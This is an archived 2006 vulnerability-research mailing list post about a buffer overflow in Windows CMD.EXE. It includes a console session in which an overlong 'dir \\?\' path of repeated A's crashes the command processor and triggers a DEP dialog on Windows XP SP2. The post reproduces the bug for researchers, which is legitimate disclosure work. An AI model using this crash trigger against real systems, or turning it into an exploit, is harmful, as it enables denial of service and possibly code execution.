Vulnerability Development mailing list archives
RE: Windows Command Processor CMD.EXE Buffer Overflow
From: "Marvin Simkin" <Marvin.Simkin () asu edu>
Date: Mon, 23 Oct 2006 08:05:29 -0700
just for clarifying if you executed the command properly -- "\\?\" is required after dir cmd.. and not one with the single slash "\?\". to reproduce the issue in winxp sp2,
Sorry, one of the backslashes got lost somehow in copy and paste. With two backslashes it works as advertised and I get the DEP dialog. C:\>cmd Microsoft Windows XP [Version 5.1.2600] (C) Copyright 1985-2001 Microsoft Corp. C:\>%COMSPEC% /K "dir \\?\AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA" [DEP dialog here] C:\>
Current thread:
- Re: Windows Command Processor CMD.EXE Buffer Overflow, (continued)
- Re: Windows Command Processor CMD.EXE Buffer Overflow The SNiFF (Oct 20)
- RE: Windows Command Processor CMD.EXE Buffer Overflow Luis Alberto Cortes Zavala (Oct 21)
- RE: Windows Command Processor CMD.EXE Buffer Overflow Osvaldo Casagrande (Oct 20)
- RE: Windows Command Processor CMD.EXE Buffer Overflow Marvin Simkin (Oct 21)
- RE: Windows Command Processor CMD.EXE Buffer Overflow Marvin Simkin (Oct 21)
- RE: Windows Command Processor CMD.EXE Buffer Overflow gregory_panakkal (Oct 21)
- Re: Windows Command Processor CMD.EXE Buffer Overflow Dan Yefimov (Oct 22)
- RE: Windows Command Processor CMD.EXE Buffer Overflow Luis Alberto Cortes Zavala (Oct 22)
- Re: Windows Command Processor CMD.EXE Buffer Overflow Dan Yefimov (Oct 23)
- Re: Windows Command Processor CMD.EXE Buffer Overflow Danux (Oct 23)
- RE: Windows Command Processor CMD.EXE Buffer Overflow Marvin Simkin (Oct 21)
- RE: Windows Command Processor CMD.EXE Buffer Overflow Marvin Simkin (Oct 23)
- Re: Windows Command Processor CMD.EXE Buffer Overflow The SNiFF (Oct 20)
- Re: Windows Command Processor CMD.EXE Buffer Overflow Bernardo Wernesback (Oct 23)